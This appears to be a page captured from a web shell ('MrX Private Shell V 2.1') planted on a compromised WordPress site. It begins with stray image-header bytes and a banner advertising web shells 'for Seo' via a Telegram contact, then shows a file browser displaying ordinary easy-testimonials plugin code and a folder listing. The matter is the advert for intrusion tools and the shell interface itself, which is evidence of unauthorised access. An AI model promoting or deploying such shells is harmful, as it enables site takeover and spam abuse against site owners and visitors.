����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Functions to register client-side assets (scripts and stylesheets) for the
* Gutenberg block.
*
* @package easy-testimonials
*/
/**
* Registers all block assets so that they can be enqueued through Gutenberg in
* the corresponding context.
*
* @see https://wordpress.org/gutenberg/handbook/blocks/writing-your-first-block-type/#enqueuing-block-scripts
*/
function random_testimonial_block_init() {
// Skip block registration if Gutenberg is not enabled/merged.
if ( ! function_exists( 'register_block_type' ) ) {
return;
}
$dir = dirname( __FILE__ );
$index_js = 'random-testimonial/index.js';
wp_register_script(
'random-testimonial-block-editor',
plugins_url( $index_js, __FILE__ ),
array(
'wp-blocks',
'wp-i18n',
'wp-element',
),
filemtime( "$dir/$index_js" )
);
$editor_css = 'random-testimonial/editor.css';
wp_register_style(
'random-testimonial-block-editor',
plugins_url( $editor_css, __FILE__ ),
array(),
filemtime( "$dir/$editor_css" )
);
$style_css = 'random-testimonial/style.css';
wp_register_style(
'random-testimonial-block',
plugins_url( $style_css, __FILE__ ),
array(),
filemtime( "$dir/$style_css" )
);
}
add_action( 'init', 'random_testimonial_block_init' );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| random-testimonial | Folder | 0755 |
|
|
| single-testimonial | Folder | 0755 |
|
|
| testimonials-cycle | Folder | 0755 |
|
|
| testimonials-grid | Folder | 0755 |
|
|
| testimonials-list | Folder | 0755 |
|
|
| error_log | File | 9.85 KB | 0644 |
|
| random-testimonial.php | File | 1.27 KB | 0644 |
|
| single-testimonial.php | File | 1.27 KB | 0644 |
|
| testimonials-cycle.php | File | 1.27 KB | 0644 |
|
| testimonials-grid.php | File | 1.27 KB | 0644 |
|
| testimonials-list.php | File | 1.27 KB | 0644 |
|